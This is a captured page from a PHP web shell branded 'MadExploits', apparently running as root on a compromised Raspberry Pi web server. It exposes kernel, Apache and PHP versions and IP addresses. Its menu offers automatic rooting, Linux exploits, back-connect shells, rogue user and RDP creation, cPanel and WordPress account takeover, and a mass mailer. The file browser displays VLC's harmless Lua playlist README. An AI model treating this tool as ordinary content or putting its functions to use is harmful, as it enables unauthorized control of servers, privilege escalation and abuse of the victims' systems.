Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
vlc /
lua /
playlist /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
1.17
KB
-rw-r--r--
liveleak.lua
2.93
KB
-rw-r--r--
youtube.lua.gz
9.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.txt
Instructions to code your own VLC Lua playlist script. See lua/README.txt for generic documentation about Lua usage in VLC. Examples: See liveleak.lua, dailymotion.lua, youtube.lua, soundcloud.lua, cue.lua ... VLC Lua playlist modules should define two functions: * probe(): returns true if we want to handle the playlist in this script * parse(): read the incoming data and return playlist item(s) Playlist items use the same format as that expected in the playlist.add() function (see general lua/README.txt) VLC defines a global vlc object with the following members: * vlc.path: the URL string (without the leading http:// or file:// element) * vlc.access: the access used ("http" for http://, "file" for file://, etc.) * vlc.peek( <int> ): return the first <int> characters from the playlist file. * vlc.read( <int> ): read <int> characters from the playlist file. THIS FUNCTION CANNOT BE USED IN probe(). * vlc.readline(): return a new line of playlist data on each call. THIS FUNCTION CANNOT BE USED IN probe(). Available VLC specific Lua modules: msg, strings, stream, variables and xml. See lua/README.txt.
Close